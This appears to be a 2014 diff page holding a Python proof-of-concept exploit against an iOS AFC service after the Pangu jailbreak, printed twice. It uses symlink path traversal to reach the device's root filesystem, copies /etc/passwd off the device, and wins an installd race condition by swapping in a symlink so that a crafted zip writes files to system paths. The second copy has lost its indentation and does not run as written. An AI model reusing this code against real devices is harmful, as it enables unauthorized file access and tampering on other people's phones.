PythEch · July 1, 2014 16:52
diff --git a/pwn.py b/pwn.py
 #! /usr/bin/env python
 """
    PoC of AFCd Vulnerability After Pangu Jailbreak
    Copyright (C) 2014  PythEch

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 """

 from pymobiledevice.afc import AFCClient
 from pymobiledevice.lockdown import LockdownClient

 from zipfile import ZipFile

 # THANKS evaders, uh and Pangu!
 # On 7.1.1 jb, I CAN HAS SYMLINK TO / again.

 lockdown = LockdownClient()
 afc=AFCClient(lockdown)
 afc.make_directory("Downloads/a/a/a/a/a/")
 afc.make_link("../../../../../", "Downloads/a/a/a/a/a/.haxx")
 afc.file_rename("Downloads/a/a/a/a/a/.haxx", ".haxx")

 # Lemme grab your root password...
 # j/k

 with open('passwd', 'wb') as f:
    f.write(afc.get_file_contents('.haxx/etc/passwd'))

 # LET'S PWN THE DEVICE!
 # evasi0n7 installd race condition

 #prepare zip

 with ZipFile('pwned.zip', 'w') as payload:
    payload.write('payload/hi', '/var/mobile/Preferences/hi')
    payload.write('payload/bigfile', '/var/tmp/bigfile')

 def get_staging():
    try:
        return next(x for x in afc.read_directory(".haxx/tmp/") if x.startswith("install_staging"))
    except StopIteration:
        return get_staging()

 def install_ipa_and_race():
    afc.set_file_contents("/pwned.zip", open("pwned.zip",'rb').read())
    mci = lockdown.startService("com.apple.mobile.installation_proxy")
    mci.sendPlist({
            'Command': 'Install',
            'PackagePath': "pwned.zip"
            })
    #HAXX
    staging = ".haxx/tmp/%s/foo_extracted" % get_staging()
    afc.file_rename(staging, staging+".old")
    afc.make_link("../../../", staging)

    while 1:
        z = mci.recvPlist()
        if not z or z.get('Error'):
            break

    if "bigfile" not in afc.read_directory(".haxx/tmp/"):
        print "Unsuccessful"
        install_ipa_and_race()

 install_ipa_and_race()
 print "Done!"
 afc.file_remove('.haxx/tmp/bigfile')
 raw_input()
	#! /usr/bin/env python
	"""
	PoC of AFCd Vulnerability After Pangu Jailbreak
	Copyright (C) 2014 PythEch

	This program is free software: you can redistribute it and/or modify
	it under the terms of the GNU General Public License as published by
	the Free Software Foundation, either version 3 of the License, or
	(at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program. If not, see <http://www.gnu.org/licenses/>.
	"""

	from pymobiledevice.afc import AFCClient
	from pymobiledevice.lockdown import LockdownClient

	from zipfile import ZipFile

	# THANKS evaders, uh and Pangu!
	# On 7.1.1 jb, I CAN HAS SYMLINK TO / again.

	lockdown = LockdownClient()
	afc=AFCClient(lockdown)
	afc.make_directory("Downloads/a/a/a/a/a/")
	afc.make_link("../../../../../", "Downloads/a/a/a/a/a/.haxx")
	afc.file_rename("Downloads/a/a/a/a/a/.haxx", ".haxx")

	# Lemme grab your root password...
	# j/k

	with open('passwd', 'wb') as f:
	f.write(afc.get_file_contents('.haxx/etc/passwd'))

	# LET'S PWN THE DEVICE!
	# evasi0n7 installd race condition

	#prepare zip

	with ZipFile('pwned.zip', 'w') as payload:
	payload.write('payload/hi', '/var/mobile/Preferences/hi')
	payload.write('payload/bigfile', '/var/tmp/bigfile')

	def get_staging():
	try:
	return next(x for x in afc.read_directory(".haxx/tmp/") if x.startswith("install_staging"))
	except StopIteration:
	return get_staging()

	def install_ipa_and_race():
	afc.set_file_contents("/pwned.zip", open("pwned.zip",'rb').read())
	mci = lockdown.startService("com.apple.mobile.installation_proxy")
	mci.sendPlist({
	'Command': 'Install',
	'PackagePath': "pwned.zip"
	})
	#HAXX
	staging = ".haxx/tmp/%s/foo_extracted" % get_staging()
	afc.file_rename(staging, staging+".old")
	afc.make_link("../../../", staging)

	while 1:
	z = mci.recvPlist()
	if not z or z.get('Error'):
	break

	if "bigfile" not in afc.read_directory(".haxx/tmp/"):
	print "Unsuccessful"
	install_ipa_and_race()

	install_ipa_and_race()
	print "Done!"
	afc.file_remove('.haxx/tmp/bigfile')
	raw_input()